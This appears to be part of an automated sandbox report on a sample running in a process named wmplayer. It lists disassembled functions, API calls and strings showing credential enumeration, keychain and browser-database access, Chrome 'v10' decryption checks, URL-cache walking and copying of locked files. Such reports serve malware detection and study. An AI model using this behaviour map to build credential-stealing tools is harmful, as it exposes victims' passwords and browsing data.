                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                            • memset.MSVCRT ref: 00445986
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                            • API String ID: 2263259095-3798722523
                                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                            Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                            • API String ID: 2744995895-28296030
                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                            Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                                            • memset.MSVCRT ref: 0040B756
                                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                            • memset.MSVCRT ref: 0040B851
                                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                            • memset.MSVCRT ref: 0040BB53
                                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                            • String ID: chp$v10
                                                                                            • API String ID: 4165125987-2783969131
                                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                            Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f free 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                            APIs
                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                            • free.MSVCRT ref: 0040E49A
                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                            • memset.MSVCRT ref: 0040E380
                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                            • API String ID: 3849927982-2252543386
                                                                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                            Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004091E2
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                            • String ID:
                                                                                            • API String ID: 3715365532-3916222277
                                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                            Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->638 659->654 660->650 662->641
                                                                                            APIs
                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                            • memset.MSVCRT ref: 00413D7F
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                            • memset.MSVCRT ref: 00413E07
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                            • free.MSVCRT ref: 00413EC1
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                            • API String ID: 1344430650-1740548384
                                                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                            Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                            • String ID: bhv
                                                                                            • API String ID: 4234240956-2689659898
                                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                            Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2941347001-70141382
                                                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                            Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 710 4467ac-4467b7 __setusermatherr 702->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->711 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 709 446755-446758 706->709 708->700 712 44673d-446745 708->712 709->702 710->711 715 446810-446819 711->715 716 44681e-446825 711->716 712->709 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 725 446853-446864 GetStartupInfoW 720->725 726 44684d-446851 720->726 721->719 722->718 722->723 723->720 727 446840-446842 723->727 729 446866-44686a 725->729 730 446879-44687b 725->730 726->725 726->727 727->720 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                            • String ID:
                                                                                            • API String ID: 2827331108-0
                                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                            Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040C298
                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                            • String ID: visited:
                                                                                            • API String ID: 1157525455-1702587658
                                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                            Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 free 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                                                                            APIs
                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                            • free.MSVCRT ref: 0040E28B
                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Strings
                                                                                            Memory Dump Source
